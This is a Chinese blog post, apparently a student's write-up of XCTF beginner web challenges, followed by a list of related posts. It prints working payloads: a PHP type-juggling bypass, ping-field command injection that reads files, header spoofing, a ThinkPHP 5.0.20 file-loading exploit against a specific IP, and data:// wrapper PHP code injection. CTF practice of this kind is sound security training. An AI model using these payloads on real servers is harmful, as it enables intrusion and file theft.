[XCTF攻防世界]simple_php|baby_web|command_execution|xff_referer|simple_js|php_rce|Web_php_include|做题笔记

最新推荐文章于 2024-05-18 11:04:16 发布
最新推荐文章于 2024-05-18 11:04:16 发布
阅读量138 收藏
点赞数
分类专栏: CTF解题 #攻防世界XCTF 文章标签: php 开发语言 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50553973/article/details/129613166
版权

先进行代码审计

发现包含了config.php

url接收参数a和b的值

如果$a等于0 and $a,输出$flag1

如果$b是数字或者字符串那么退出当前脚本

如果$b>1234,输出$flag2

所以,这里我们既要保证输出$a,$b,又要保证$b是数字,那么就用到php的弱类型比较了

所以payload为:?a=c&b=1235a

根据提示初始界面一般为:index.php

所以我们访问

发现会自动重定向到1.php说明有问题我们打开开发者工具中的网络看看

发现index.php确实存在接着我们就看到了flag

这题其实就是一个命令注入

我们在ping中127.0.0.1|ls../../../home/

会发现flag.txt

之后使用127.0.0.1|cat ../../../home/flag.txt

即可获得flag

这题需要进行地址伪造

x-forwarded-for:123.123.123.123

referer: https://www.google.com

这样我就拿到flag了

cyberpeace{61b912dbdbaf855ad97a58e603482f2b}

查看源代码发现有东西

我们将其分析后重写

在浏览器中打开即可获得flag

 Cyberpeace{786OsErtk12}

我们访问

发现是ThinkPHP V5.0.20框架

我们使用检测工具进行检测

发现存在payload我们直接利用

http://61.147.171.105:62701/?s=index/\think\Lang/load&file=/flag

之后就发现了flag

这道题运用到了data://伪协议

Payload:?page=data://text/plain,<?php phpinfo()?>

echo $_SERVER['DOCUMENT_ROOT']; 先得到目录路径:

Payload:?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT'];?>

 然后用<?php print_r(scandir('/var/www')); ?>读取当前目录文件

Payload: ?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

看到 flag 文件了再用 file_get_contents 就可以读到里面的内容了:

<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

Payload:?page=data://text/plain,<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

最后得到flag

明裕学长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xctf.rar_HTML5自适应
09-19
实现html5全屏滚动效果的源码,全屏平滑滚动,自适应浏览器
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训.pptx
XCTF Web 新手区007:simple_php
立志成为最会敲代码的dancer,最会locking的程序猿
04-01 198
题目: WP: 本题考察PHP类型比较 附上php函数转化的形式 :即数字和字符混合的字符串转换为整数后只保留数字 <?php $str="123.9abc"; $int=intval($str); //转换后数值:123 $float=floatval($str); //转换后数值:123.9 $str=...
XCTF_Web_新手练习区:simple_php
1stPeak's Blog
06-13 6561
第十二题:simple_php 目标: 掌握php弱类型比较 php中其中两种比较符号: ==:先将字符串类型转化成相同,再比较 ===:先判断两种字符串的类型是否相等,再比较 字符串和数字比较使用==时,字符串会先转换为数字类型再比较 var_dump('a' == 0);//true,此时a字符串类型转化成数字,因为a字符串开头中没有找到数字,所以转换为0 var_dump('123...
小宁听说php是最好的语言,XCTF攻防世界web新手练习—simple_php
weixin_42100129的博客
03-10 452
题目题目为simple_php,根据题目信息,判断是关于php代码审计的.小宁听说的很对,PHP的最好的语言。打开题目,得到一串php代码show_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0 and $a){echo $flag1;}if(is_numeric($b)){exit();}...
XCTF-WEB练习区- 007-simple_php
weixin_42986599的博客
03-27 2718
007-simple_php 题目描述 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 解题思路 阅读这个php代码,它要求a==0成立并且a不为0(false),才会输出flag1,要求b>1234并且b不为数字,才会输出flag2。 php里的比较会把两边类型转化成一样的再比,所以可以把 a 设置成字符 ‘0’。数字和字符混合以后转化成整数只保留数字,所以可以把b设置为1235t 在url里加上 ?a=‘0’&b=1235t ...
XCTF WEB simple_php
无限迭代中......
07-01 3092
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072 题解: 掌握php弱类型比较 php中有两种比较符号: ==: 先将字符串类型转化成相同,再比较 ===: 先将字符串类型转化成相同,再比较 字符串和数字比较使用==时,字符串会先转换为数字类型再比较php var...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训.pptx
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
XCTF_A_成本管理标准功能培训.pptx
09-25
XCTF_A_成本管理标准功能培训.pptx
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
xctf社区题解1
Spwpun的博客
03-30 3167
web-新手模式: view-source: 鼠标右键被网页禁用了吧,F12查看即可: get_post: 提交之后,显示: robots: 访问robots.txt,发现f1ag_1s_h3re.php页面: 访问f1ag_1s_h3re.php页面: backup: 常见的备份文件后缀名有:.git .svn .swp .~ .bak .bash_history,访问提示如下: ...
xctf websimple_php
L1ni01
08-08 201
打开题目发现源码 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ exit(); } if($b>1234){ echo $flag2; } ?> 看看关键条件 第一个是变量 a==0 并且 a存在的时候会输出flag的前半部分 第二个是当
8、XCTF simple_php
山兔的博客
09-16 224
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 打开网站,就看到了下面这个 <?php show_source(__FILE__); //查看源文件 include("config.php"); //包含config,php $a=@$_GET['a']; //变量a通过参数a get方式获取 $b=@$_GET['b']; //变量b通过参数b get方式获取 if($a==0
XCTF攻防世界web新手练习_ 10_simple_php
silence1_的博客
04-29 4508
XCTF攻防世界web新手练习—simple_php 题目 题目为simple_php,根据题目信息,判断是关于php代码审计的 打开题目,得到一串php代码 代码很简单,就是以GET方式获得两个参数a和b,如果a和b满足一定条件,则打印flag1和flag2,猜测将flag1和flag2拼接就能够得到完整flag 接下来看代码,注意到: if($a==0 and $a){ echo...
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 735
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
关于 struct sockaddr_in
weixin_73964834的博客
05-16 658
这个struct sockaddr_in 前三行有三个变量。
如何构建基因单倍型网络
最新发布
hgz2020的博客
05-18 582
单倍型分析
FebHost:为什么企业需要注册保加利亚.BG域名?
05-16 376
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
pure_color xctf
07-16
pure_color xctf 提供了逼真的仿真环境,使得参赛者能够在一个安全的网络环境下进行实时的攻防演练。平台上的题目多样化且具有挑战性,旨在让参赛者将所学的理论知识应用到实际场景中去,并培养解决问题和团队合作的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明裕学长

打赏私我进交流群

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值